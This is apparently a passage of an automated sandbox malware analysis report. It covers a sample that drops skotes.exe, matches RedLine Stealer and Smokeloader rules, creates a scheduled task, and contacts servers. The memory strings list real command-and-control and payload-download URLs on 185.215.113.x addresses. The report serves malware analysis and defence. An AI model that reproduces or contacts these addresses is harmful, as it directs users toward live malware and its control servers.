                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.103/steam/random.exe;
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001C.00000002.4669012464.0000000000743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf0
                  Source: skotes.exe, 0000001C.00000002.4669668588.00000000008C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php6
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpb
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpn
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                  Source: skotes.exe, 0000001C.00000002.4669012464.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpx
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpxe
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpxe9/:x
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpy1mb3JtLXVybGVuY29kZWQ=
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/fac00b58981f4a4e1a0ce7e9f0e5ebf5de04349025080d9#
                  Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net

                  System Summary

                  barindex
                  Source: 0000001C.00000002.4668968733.00000000006D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.2353337149.000000000052C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000015.00000002.2334468394.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0041CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,0_2_0041CB97
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0041CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,28_2_0041CB97
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00409A000_2_00409A00
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0040AA090_2_0040AA09
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_004470490_2_00447049
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_004261920_2_00426192
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_004431A80_2_004431A8
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_004216020_2_00421602
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0044779B0_2_0044779B
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_004488600_2_00448860
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_004478BB0_2_004478BB
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00404B300_2_00404B30
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00442D100_2_00442D10
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00404DE00_2_00404DE0
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00423DF10_2_00423DF1
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00420E130_2_00420E13
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00437F360_2_00437F36
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021C72B00_2_021C72B0
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021A63F90_2_021A63F9
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021A40580_2_021A4058
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021850470_2_02185047
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021A107A0_2_021A107A
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021B819D0_2_021B819D
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021C7A020_2_021C7A02
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021C8AC70_2_021C8AC7
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021C7B220_2_021C7B22
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021A18690_2_021A1869
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021C2F770_2_021C2F77
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_02184D970_2_02184D97
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021B72B021_2_021B72B0
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021963F921_2_021963F9
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_0219405821_2_02194058
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_0217504721_2_02175047
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_0219107A21_2_0219107A
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021A819D21_2_021A819D
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021B7A0221_2_021B7A02
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021B8AC721_2_021B8AC7
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021B7B2221_2_021B7B22
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_0219186921_2_02191869
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021B2F7721_2_021B2F77
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_02174D9721_2_02174D97
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0040E53028_2_0040E530
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0042619228_2_00426192
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0044886028_2_00448860
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00404B3028_2_00404B30
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00442D1028_2_00442D10
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00404DE028_2_00404DE0
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00420E1328_2_00420E13
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0044704928_2_00447049
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_004431A828_2_004431A8
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0042160228_2_00421602
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0044779B28_2_0044779B
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_004478BB28_2_004478BB
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00423DF128_2_00423DF1
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00437F3628_2_00437F36
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0064405828_2_00644058
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0065819D28_2_0065819D
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_006463F928_2_006463F9
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00668AC728_2_00668AC7
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00624D9728_2_00624D97
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00662F7728_2_00662F77
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0064107A28_2_0064107A
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0062504728_2_00625047
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_006672B028_2_006672B0
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0064186928_2_00641869
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00667A0228_2_00667A02
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00667B2228_2_00667B22
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041DF80 appears 46 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0063E1E7 appears 38 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0218DBA9 appears 68 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 02188327 appears 135 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041D663 appears 38 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041D64E appears 52 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00417A00 appears 38 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00638327 appears 137 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0063DBA9 appears 68 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041D942 appears 84 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0218E1E7 appears 38 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0063D8B5 appears 52 times
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 004180C0 appears 133 times
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: String function: 0041DF80 appears 43 times
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: String function: 0219E1E7 appears 38 times
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: String function: 02198327 appears 135 times
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: String function: 0041D942 appears 80 times
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: String function: 004180C0 appears 131 times
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: String function: 0219DBA9 appears 68 times
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 720
                  Source: yjzllYsjlU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0000001C.00000002.4668968733.00000000006D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.2353337149.000000000052C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000015.00000002.2334468394.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: yjzllYsjlU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: skotes.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/67@0/2
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0052D356 CreateToolhelp32Snapshot,Module32First,0_2_0052D356
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0040AA09 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,0_2_0040AA09
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6716
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1488
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6008
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                  Source: yjzllYsjlU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: yjzllYsjlU.exeReversingLabs: Detection: 39%
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeFile read: C:\Users\user\Desktop\yjzllYsjlU.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\yjzllYsjlU.exe "C:\Users\user\Desktop\yjzllYsjlU.exe"
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 720
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 788
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 852
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 896
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 920
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 852
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1044
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1120
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1176
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1400
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6008 -s 468
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 536
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 756
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dll
